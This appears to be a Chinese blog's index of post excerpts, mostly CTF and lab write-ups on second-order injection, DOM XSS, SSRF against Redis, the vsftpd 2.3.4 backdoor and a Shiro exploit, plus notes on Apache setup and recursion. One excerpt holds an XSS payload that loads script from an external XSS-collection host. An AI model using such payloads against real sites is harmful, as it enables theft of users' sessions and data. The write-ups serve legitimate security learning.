摘要:
想直接查看payload的点这里 前言 二次注入(Second-Order Injection)是指攻击者在应用程序中注入恶意数据,然后在稍后的操作或不同的上下文中再次使用该恶意数据,导致安全漏洞。它通常发生在数据库查询、数据导出、报告生成等过程中。 典型的二次注入示例包括在用户注册时注入恶意代码, 阅读全文
摘要:
前文:DOM反射XSS 进入网站,直接查看源代码,下面是关键代码,这里有xss漏洞: <script> var target = location.search.split("=") if (target[0].slice(1) == "jumpto") { location.href = targ 阅读全文
摘要:
前文链接:DOM反射xss 这次直接浏览器输入payload,发现 script 被过滤掉了 </textarea>'"><script src=http://xsscom.com//cZ2vvZ></script> 碰到这种情况不要慌,下面给出两种方法绕过过滤关键字。 双写绕过 </textare 阅读全文
摘要:
前言:本文需要注册一个xss平台,以接收xss反弹回来的数据,请自己在互联网上寻找合适的xss平台 1. 构造闭合语句 根据题目提示,判断网站存在DOM xss漏洞 查看页面源代码,发现关键位置,其中CTFHub is very niubility 是我们的可控范围 <script> $("#tex 阅读全文
摘要:
安装环境 演示服务器版本为CentOS 8 安装apache 下载apache yum install httpd httpd-devel 启动apache服务器 systemctl start httpd 设置apache开机自启 systemctl enable httpd 查看apache运行 阅读全文
摘要:
CTFHub SSRF Redis协议 进入环境,可以看到url格式为: http://challenge-2c082607df3fa433.sandbox.ctfhub.com:10800/?url= 1. 生成 根据题目,选择用工具 Gopherus 进行生成 payload 查看工具提示,使用 阅读全文
摘要:
vsftpd2.3.4笑脸漏洞复现 目标服务器:metasploitable2(192.168.171.11) 渗透机:Kali(192.168.171.21) 方法一:手动复现 首先用kali扫描一下目标机端口 nmap -sV 192.168.171.11 然后用ftp连接该ip: 用户名随便输 阅读全文
摘要:
本文章使用Shiro_exploit此工具复现,靶机环境为vulhub 项目地址: https://github.com/insightglacier/Shiro_exploit https://github.com/vulhub/vulhub 1. 搭建环境 靶机 ip:192.168.171.1 阅读全文
摘要:
目录: 一、什么是递归 1.先来看一下一个递归的例子 2.递归的基本原理 二、汉诺塔问题 1.汉诺塔的故事 2.回到编程,汉诺塔问题主要就是解决这个问题: 3.怎么解决汉诺塔问题 要解决汉诺塔问题就要用到递归思想,这里拿四层汉诺塔举例子: 4.具体代码实现 在这里可以创建一个Move方法来移动盘子 阅读全文
摘要:
这是个目录 一、什么是递归函数 1.先看一下一个递归的例子 2.递归的基本原理 二、汉诺塔问题 1.简要概括一下汉诺塔的故事 2.回到编程,汉诺塔问题主要就是解决这个问题: 3.怎么解决汉诺塔问题 要解决汉诺塔问题就要用到递归思想,这里拿四层汉诺塔举例子: 4.具体代码实现 在这里可以创建一个mov 阅读全文